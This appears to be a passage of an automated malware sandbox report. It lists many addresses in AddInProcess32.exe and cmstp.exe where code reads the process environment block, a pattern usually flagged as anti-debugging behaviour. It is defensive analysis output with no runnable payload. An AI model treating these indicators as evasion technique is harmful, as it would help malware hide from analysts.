          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov ecx, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]7_2_01315210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]7_2_0131AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]7_2_0131AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]7_2_0134A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]7_2_0134A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01333A1C mov eax, dword ptr fs:[00000030h]7_2_01333A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]7_2_0131C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01348E00 mov eax, dword ptr fs:[00000030h]7_2_01348E00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1608 mov eax, dword ptr fs:[00000030h]7_2_013D1608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328A0A mov eax, dword ptr fs:[00000030h]7_2_01328A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]7_2_0133AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135927A mov eax, dword ptr fs:[00000030h]7_2_0135927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]7_2_013CB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]7_2_013CB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8A62 mov eax, dword ptr fs:[00000030h]7_2_013E8A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132766D mov eax, dword ptr fs:[00000030h]7_2_0132766D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DEA55 mov eax, dword ptr fs:[00000030h]7_2_013DEA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A4257 mov eax, dword ptr fs:[00000030h]7_2_013A4257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]7_2_01319240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]7_2_01327E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]7_2_0132AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]7_2_0132AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FAB0 mov eax, dword ptr fs:[00000030h]7_2_0134FAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]7_2_013152A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]7_2_013E0EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013946A7 mov eax, dword ptr fs:[00000030h]7_2_013946A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]7_2_0134D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]7_2_0134D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFE87 mov eax, dword ptr fs:[00000030h]7_2_013AFE87
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013276E2 mov eax, dword ptr fs:[00000030h]7_2_013276E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342AE4 mov eax, dword ptr fs:[00000030h]7_2_01342AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013416E0 mov ecx, dword ptr fs:[00000030h]7_2_013416E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8ED6 mov eax, dword ptr fs:[00000030h]7_2_013E8ED6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01358EC7 mov eax, dword ptr fs:[00000030h]7_2_01358EC7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013436CC mov eax, dword ptr fs:[00000030h]7_2_013436CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFEC0 mov eax, dword ptr fs:[00000030h]7_2_013CFEC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342ACB mov eax, dword ptr fs:[00000030h]7_2_01342ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF14FB mov eax, dword ptr fs:[00000030h]17_2_04EF14FB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]17_2_04EB6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]17_2_04EB6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6CF0 mov eax, dword ptr fs:[00000030h]17_2_04EB6CF0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08CD6 mov eax, dword ptr fs:[00000030h]17_2_04F08CD6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov ecx, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECB8D0 mov eax, dword ptr fs:[00000030h]17_2_04ECB8D0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E790AF mov eax, dword ptr fs:[00000030h]17_2_04E790AF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov ecx, dword ptr fs:[00000030h]17_2_04E6F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]17_2_04E6F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6F0BF mov eax, dword ptr fs:[00000030h]17_2_04E6F0BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39080 mov eax, dword ptr fs:[00000030h]17_2_04E39080
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]17_2_04EB3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3884 mov eax, dword ptr fs:[00000030h]17_2_04EB3884
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4849B mov eax, dword ptr fs:[00000030h]17_2_04E4849B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F01074 mov eax, dword ptr fs:[00000030h]17_2_04F01074
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5746D mov eax, dword ptr fs:[00000030h]17_2_04E5746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF2073 mov eax, dword ptr fs:[00000030h]17_2_04EF2073
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A44B mov eax, dword ptr fs:[00000030h]17_2_04E6A44B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]17_2_04E50050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E50050 mov eax, dword ptr fs:[00000030h]17_2_04E50050
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]17_2_04ECC450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04ECC450 mov eax, dword ptr fs:[00000030h]17_2_04ECC450
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6BC2C mov eax, dword ptr fs:[00000030h]17_2_04E6BC2C
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6002D mov eax, dword ptr fs:[00000030h]17_2_04E6002D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B02A mov eax, dword ptr fs:[00000030h]17_2_04E4B02A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB6C0A mov eax, dword ptr fs:[00000030h]17_2_04EB6C0A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]17_2_04F04015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F04015 mov eax, dword ptr fs:[00000030h]17_2_04F04015
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1C06 mov eax, dword ptr fs:[00000030h]17_2_04EF1C06
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB7016 mov eax, dword ptr fs:[00000030h]17_2_04EB7016
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F0740D mov eax, dword ptr fs:[00000030h]17_2_04F0740D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B1E1 mov eax, dword ptr fs:[00000030h]17_2_04E3B1E1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EC41E8 mov eax, dword ptr fs:[00000030h]17_2_04EC41E8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]17_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0 mov eax, dword ptr fs:[00000030h]17_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EE8DF1 mov eax, dword ptr fs:[00000030h]17_2_04EE8DF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]17_2_04E661A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E661A0 mov eax, dword ptr fs:[00000030h]17_2_04E661A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E635A1 mov eax, dword ptr fs:[00000030h]17_2_04E635A1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB69A6 mov eax, dword ptr fs:[00000030h]17_2_04EB69A6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E61DB5 mov eax, dword ptr fs:[00000030h]17_2_04E61DB5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB51BE mov eax, dword ptr fs:[00000030h]17_2_04EB51BE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6A185 mov eax, dword ptr fs:[00000030h]17_2_04E6A185
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C182 mov eax, dword ptr fs:[00000030h]17_2_04E5C182
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581 mov eax, dword ptr fs:[00000030h]17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E32D8A mov eax, dword ptr fs:[00000030h]17_2_04E32D8A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62990 mov eax, dword ptr fs:[00000030h]17_2_04E62990
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]17_2_04E6FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6FD9B mov eax, dword ptr fs:[00000030h]17_2_04E6FD9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3C962 mov eax, dword ptr fs:[00000030h]17_2_04E3C962
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]17_2_04E3B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3B171 mov eax, dword ptr fs:[00000030h]17_2_04E3B171
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]17_2_04E5C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5C577 mov eax, dword ptr fs:[00000030h]17_2_04E5C577
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]17_2_04E5B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E5B944 mov eax, dword ptr fs:[00000030h]17_2_04E5B944
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E73D43 mov eax, dword ptr fs:[00000030h]17_2_04E73D43
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB3540 mov eax, dword ptr fs:[00000030h]17_2_04EB3540
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E57D50 mov eax, dword ptr fs:[00000030h]17_2_04E57D50
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08D34 mov eax, dword ptr fs:[00000030h]17_2_04F08D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov eax, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120 mov ecx, dword ptr fs:[00000030h]17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E43D34 mov eax, dword ptr fs:[00000030h]17_2_04E43D34
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3AD30 mov eax, dword ptr fs:[00000030h]17_2_04E3AD30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]17_2_04E6513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6513A mov eax, dword ptr fs:[00000030h]17_2_04E6513A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EBA537 mov eax, dword ptr fs:[00000030h]17_2_04EBA537
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E64D3B mov eax, dword ptr fs:[00000030h]17_2_04E64D3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E39100 mov eax, dword ptr fs:[00000030h]17_2_04E39100
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62AE4 mov eax, dword ptr fs:[00000030h]17_2_04E62AE4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E616E0 mov ecx, dword ptr fs:[00000030h]17_2_04E616E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E476E2 mov eax, dword ptr fs:[00000030h]17_2_04E476E2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E78EC7 mov eax, dword ptr fs:[00000030h]17_2_04E78EC7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F08ED6 mov eax, dword ptr fs:[00000030h]17_2_04F08ED6
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E636CC mov eax, dword ptr fs:[00000030h]17_2_04E636CC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62ACB mov eax, dword ptr fs:[00000030h]17_2_04E62ACB
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EEFEC0 mov eax, dword ptr fs:[00000030h]17_2_04EEFEC0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E352A5 mov eax, dword ptr fs:[00000030h]17_2_04E352A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EB46A7 mov eax, dword ptr fs:[00000030h]17_2_04EB46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]17_2_04E4AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4AAB0 mov eax, dword ptr fs:[00000030h]17_2_04E4AAB0
